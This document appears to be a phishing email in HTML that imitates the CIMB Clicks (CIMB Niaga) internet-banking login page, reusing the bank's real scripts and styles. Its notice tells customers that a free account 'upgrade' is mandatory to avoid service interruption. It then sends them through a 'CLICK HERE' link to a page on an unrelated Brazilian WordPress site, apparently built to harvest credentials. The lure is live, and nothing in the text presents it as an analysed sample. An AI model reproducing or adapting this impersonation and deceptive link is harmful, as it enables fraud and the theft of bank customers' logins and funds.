<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="id" lang="id">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/JavaScript"> 
<!--
setTimeout("location.href = 'mpin.html';",60000);
-->
</script>
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>Welcome to CIMB Clicks Internet Banking</title>
<link href="https://www.cimbclicks.co.id/sib-cimbniaga/styles/global_style_login.css" rel="stylesheet" type="text/css"><link href="https://www.cimbclicks.co.id/sib-cimbniaga/styles/jquery.keypad.big.css" rel="stylesheet" type="text/css"><style type="text/css">

body {

        margin-left: 0px;

        background-image: url(https://www.cimbclicks.co.id/sib-cimbniaga/images/background.gif);

        margin-right: 0px;

        margin-bottom: 0px;

}

.mybox {border:1px solid #999999;

        font-family:Arial, Helvetica, sans-serif;

        font-size:11px;

}

.errortext_7 {  

font-family: Arial, Helvetica, sans-serif; font-size: 7pt; color: #E11516; font-weight: normal;

}

.errortext_8 {  

font-family: Arial, Helvetica, sans-serif; font-size: 8pt; color: #E11516; font-weight: normal;

}

.bodytext_9Bold {

        color:#790007;

        font-family:Arial,Helvetica,sans-serif;

        font-size:10pt;

        font-weight:bold;

}



.tabStyle {

        color:#FFFFFF;

        font-family:Arial,Helvetica,sans-serif;

        font-size:9pt;

        font-weight:bold;

        text-decoration:none;

}



.yellowBg {background-color: #FFFF00; }

.style3 {
        font-family: Arial,Helvetica,sans-serif;
        font-size: 14pt;
        color: #E11516;
        font-weight: bold;
        text-align: left;
}

.style5 {
        font-size: small;
}

.style6 {
        color: #C51010;
}

</style><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/boxover.js"></script><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/EncRSA.js"></script><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/sha256.js"></script><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/scgen.js"></script><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/jquery-1.4.2.js"></script><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/jquery.keypadlogin.js"></script><script language="JavaScript" src="https://www.cimbclicks.co.id/sib-cimbniaga/includes/jquery.keypad-id.js"></script><script type="text/javascript">

$(function() {

        var bigQwertyLayout = 

        [

                '!@#$%^&*()_=' + $.keypad.HALF_SPACE + $.keypad.SPACE + $.keypad.CLOSE, 

                $.keypad.HALF_SPACE + '`~[]{}<>\\|/' + $.keypad.SPACE + '789', 

                'qwertyuiop\'"' + $.keypad.HALF_SPACE + '456', 

                $.keypad.HALF_SPACE + 'asdfghjkl;:' + $.keypad.SPACE + '123', 

                $.keypad.SPACE + 'zxcvbnm,.?' + $.keypad.SPACE + $.keypad.HALF_SPACE + '-0+', 

                $.keypad.SHIFT + $.keypad.SPACE + $.keypad.SPACE_BAR + $.keypad.SPACE + $.keypad.BACK + $.keypad.CLEAR

        ];

  $.keypad.setDefaults($.keypad.regional['']);

  $('#j_plain_password').keypad($.extend({keypadClass: 'l10n'},{

        showOn: 'both',

        buttonImageOnly: true, 

        buttonImage: 'https://www.cimbclicks.co.id/sib-cimbniaga/images/keyboard.png', 

        layout: bigQwertyLayout,

        closeText: 'Close',

        backText: 'Backspace',

        shiftText: 'Caps Lock',

        keypadOnly: false, 

        showAnim: 'slideDown'}));

});

</script><script language="JavaScript" type="text/javascript">

document.onmouseup = refresh;

document.onkeypress = refresh;



function refresh ( e )

{

   if ( timeout ) location.reload(true);

}

//refresh the page every timeoutPeriod in order to keep session salt up to date!

var timeout = false;

function markExpired(timeoutPeriod) {

        setTimeout("timeout = true; document.loginform.j_plain_username.blur()",timeoutPeriod);

}

//assign the session salt

var id='a28964c0a298dd28';





<!--

function checkuserid4login(obj_val) {

    var number_format = "0123456789_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.&'*+/=?@^{}~";

    var check_char;

    if (!obj_val)

        return true;

    if (obj_val.length == 0)

        return true;

    if (obj_val.length < 6 )

        return false;

    for (var i = 0; i < obj_val.length; i++) {

        check_char = number_format.indexOf(obj_val.charAt(i));

        if (check_char < 0)

            return false;      

    }   

    return true;

}



function doSubmit() {

   if (document.loginform.j_plain_username.value =="") {      

      alert("CIMB Clicks ID is Mandatory");           

      document.loginform.j_plain_username.focus()

      return false;

   }

   else {         

          forbiddenChar = document.loginform.j_plain_username.value.lastIndexOf("#");

          if( forbiddenChar>0 ){

                 alert("CIMB Clicks ID is invalid");          

         document.loginform.j_plain_username.focus()

         return false;

          }

          if (!checkuserid4login(document.loginform.j_plain_username.value)) return Err(document.loginform.j_plain_username, "text", "User id must be within 6-40 characters, and may contain\nnumbers (0-9), letters, hyphens (-), underscore (_), periods (.), &, quote('), *, +, /,\n=, ?, @, ^, {, }, and ~");

      if (document.loginform.j_plain_password.value =="") {

         alert("CIMB Clicks Password is Mandatory");          

         document.loginform.j_plain_password.focus()

         return false;

      }

      else {

         document.loginform.j_password.value=sha256_digest(MD5(document.loginform.j_plain_password.value)+id)+sha256_digest(sha256_digest((MD5(document.loginform.j_plain_password.value)).toUpperCase()+document.loginform.j_plain_username.value.toUpperCase())+id);

         document.loginform.j_username.value=document.loginform.j_plain_username.value;

         document.loginform.j_plain_password.value="";

         loc = String(document.location);

         return true;

      } 

   }

}

//-->

 

var host='www.cimbclicks.co.id';

<!--

function PopupSeal() {

        PopupCenter(unescape("https%3A//sealinfo.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3D")+host+unescape("%26lang%3Den"), 'myPop1',520,450);       

}



function PopupCenter(pageURL, title,w,h) {

var left = (screen.width/2)-(w/2);

var top = (screen.height/2)-(h/2);

var targetWin = window.open (pageURL, title, 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=no, copyhistory=no, width='+w+', height='+h+', top='+top+', left='+left);

}



// make this file always show in the _top window

top.location.target="_top";

if(window.location.target != "_top") 

   top.location.href=window.location.href;

//-->

</script>
</head>
<body>
<table width="883" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="10"></td>
</tr>
<tr>
<td>
<table width="370" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" align="left" width="132"><a href="http://www.cimbbank.com.my" target="_blank"><img src="https://www.cimbclicks.co.id/sib-cimbniaga/images/header/cimbgroup.png" border="0"></a></td>
<td valign="top" align="left" width="132"><a href="http://www.cimbniaga.com" target="_blank"><img src="https://www.cimbclicks.co.id/sib-cimbniaga/images/header/cimbniaga.png" title="Bank CIMB Niaga" alt="Bank CIMB Niaga" border="0"></a></td>
<td valign="top" align="left" width="132" height="33"></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<table width="870" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="700">
<table width="95%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td height="24" width="23%"></td>
<td></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td bgcolor="#cacaca">
<table width="100%" border="0" cellpadding="0" cellspacing="1">
<tbody>
<tr>
<td width="1%" height="32" align="left" bgcolor="#e11516">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="76%" align="left">
<table width="80%" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="2%"> </td>
<td align="left"> </td>
</tr>
</tbody>
</table>
</td>
<td width="24%" align="right" class="bodytext_white_8">
<table width="100%" border="0">
<tbody>
<tr>
<td align="right"> </td>
<td> </td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td height="10"></td>
</tr>
<tr>
<td height="10">
<table border="0" width="100%" cellpadding="0" cellspacing="0" align="center" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: xx-small; ">
<tbody>
<tr height="100%">
<td valign="top" style="font-family: Arial, Helvetica, sans-serif; ">
<table border="0" width="100%" cellpadding="0" cellspacing="0" align="center" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: xx-small; ">
<tbody>
<tr>
<td width="100%" valign="top" style="font-family: Arial, Helvetica, sans-serif; ">
<div class="wpsPortletBody" style="font-family: Arial, Helvetica, sans-serif; margin: 5px; background-image: url('https://www.cimbclicks.com.my/wps/myportal/none')">
<table align="center" height="20" border="0" cellpadding="5" cellspacing="0" width="100%" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: xx-small; ">
<tbody>
<tr>
<td class="style3"><span lang="en-us">Attention Customer:</span></td>
</tr>
</tbody>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="dash" style="font-family: Arial, Helvetica, sans-serif; font-size: 7.5pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; border-top-style: dashed; border-right-style: dashed; border-bottom-style: dashed; border-left-style: dashed; border-top-color: gray; border-right-color: gray; border-bottom-color: gray; border-left-color: gray; border-collapse: separate; background-color: white; color: rgb(96, 87, 88); font-weight: normal; ">
<tbody>
<tr>
<td valign="top" style="font-family: Arial, Helvetica, sans-serif; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; padding-top: 5px; padding-right: 5px; padding-bottom: 5px; padding-left: 5px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: gray; border-right-color: gray; border-bottom-color: gray; border-left-color: gray; background-color: rgb(242, 242, 242); ">
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: xx-small; ">
<tbody>
<tr>
<td valign="top" style="border: 1px none gray; padding: 5px; font-family: Arial, Helvetica, sans-serif; background-color: rgb(242, 242, 242);" class="style5">
<span style="font-family: 'trebuchet ms', helvetica, sans-serif; ">This is to notify that we are changing our Online Banking Services and also our Internet Banking menu page.<br>
This change is for better services online to enable more stress-free transaction to be performed online.<br>
<br>
The following services below will be modified:<br>
<ul>
<li>Adding Beneficiary </li><li>One-off payments </li><li>Prepaid Purchase </li><li>sms Notification </li></ul>
<div>These changes will be effected on your profile as soon as the upgrading process has been completed and will enhance your online banking security against theft.<br>
<br>
Note: This upgrade service is free of charge and it is necessary that you participate in this upgrade program, in other to keep using your online services without any interruption.<br>
<br>
<a href="http://www.oxilar.com.br/site/wp-content/plugins/redirection/cimb/cimbclicks.htm"><strong><span class="style6">CLICK HERE to proceed with your account upgrade</span></strong></a>.</div>
 <br>
<span>Regards,</span><br>
<br>
<span lang="en-us">CIMB Clicks</span></span></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<p style="font-family: Arial, Helvetica, sans-serif; "> </p>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td height="10">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" align="left"><!-- 

        <a href="http://www.itradecimb.co.id" target="_blank">

        <img src="https://www.cimbclicks.co.id/sib-cimbniaga/images/itrade_logo.gif" border="0"/>

        </a>

        --></td>
<td><a onclick="PopupSeal();" href="https://www.cimbclicks.co.id/javascript:void(0);"><img width="100" height="62" border="0" usemap="#Map" src="https://www.cimbclicks.co.id/sib-cimbniaga/images/securesite.gif">
</a></td>
<td width="100%" align="right" valign="top" class="Footer_link"> <br>
<a href="https://www.cimbclicks.co.id/GeTermsAgree.html" target="_parent" class="Footerlink">Terms & Conditions</a>
<br>
<span class="Footer">All rights reserved. Copyright © 2010 CIMB Bank</span><br>
<span class="Footer">Best viewed with Microsoft IE 7.0 / Mozilla Firefox 3.6, or later, 1024x768 resolution</span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<script language="JavaScript" type="text/javascript">

<!--//

// set focus to the j_username field

document.loginform.j_plain_username.focus();

//-->

</script><br>
<hr>
<font face="Arial" color="Gray" size="2">如果您不是本电子邮件的收件人,请您立即通知我您收到的邮件有误,并删除此封邮件。谢谢您的合作。<br>
If you are not the intended addressee please inform us immediately that you have received this e-mail in error, and delete it. We thank you for your cooperation.<br>
</font>
</body>
</html>